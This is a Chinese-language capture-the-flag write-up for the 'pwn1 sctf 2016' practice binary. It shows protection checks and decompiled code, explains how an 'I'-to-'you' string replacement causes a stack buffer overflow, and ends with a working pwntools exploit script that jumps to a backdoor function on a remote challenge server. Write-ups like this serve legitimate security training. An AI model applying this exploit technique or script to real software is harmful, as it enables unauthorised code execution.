pwn1 sctf 2016
# pwn1 sctf 2016
# 前提
# 查看文件保护
root@localhost ~# checksec pwn1_sctf_2016
[*] '/root/pwn1_sctf_2016'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
7
2
3
4
5
6
7
# 静态分析
主函数只调用了一个vuln函数,该函数如下
int vuln()
{
const char *v0; // eax
char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
char v4[7]; // [esp+40h] [ebp-18h] BYREF
char v5; // [esp+47h] [ebp-11h] BYREF
char v6[7]; // [esp+48h] [ebp-10h] BYREF
char v7[5]; // [esp+4Fh] [ebp-9h] BYREF
printf("Tell me something about yourself: ");
fgets(s, 32, edata);
std::string::operator=(&input, s);
std::allocator<char>::allocator(&v5);
std::string::string(v4, "you", &v5);
std::allocator<char>::allocator(v7);
std::string::string(v6, "I", v7);
replace((std::string *)v3);
std::string::operator=(&input, v3, v6, v4);
std::string::~string(v3);
std::string::~string(v6);
std::allocator<char>::~allocator(v7);
std::string::~string(v4);
std::allocator<char>::~allocator(&v5);
v0 = (const char *)std::string::c_str((std::string *)&input);
strcpy(s, v0);
return printf("So, %s\n", s);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
查找函数表发现后门函数get_flag
int get_flag()
{
return system("cat flag.txt");
}
1
2
3
4
2
3
4
# 思路分析
- 目前信息
- 变量
s处可写入32字节数据 - s距离返回地址的偏移量为
0x3c+4>32,不够溢出 - 存在后门函数
- 变量
- replace函数
- 查看后发现其作用为循环检测将我们输入的字符
I替换为字符you
- 查看后发现其作用为循环检测将我们输入的字符
- 思路
replace函数在字符替换的过程中将1个字节替换为了3个字节的数据,所以理论上可以通过输入21个I加1个a的方式溢出到返回地址处,将该处覆盖为后门函数的地址即可获得flag
# exp
from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/pwn1_sctf_2016/pwn1_sctf_2016'
# io = process(pwnfile)
io = remote('node4.buuoj.cn', 28185)
elf = ELF(pwnfile)
backdoor = elf.symbols['get_flag']
payload = flat(['I'*21, 'a', backdoor])
io.sendline(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
2
3
4
5
6
7
8
9
10
上次更新: 2022/08/15, 00:29:49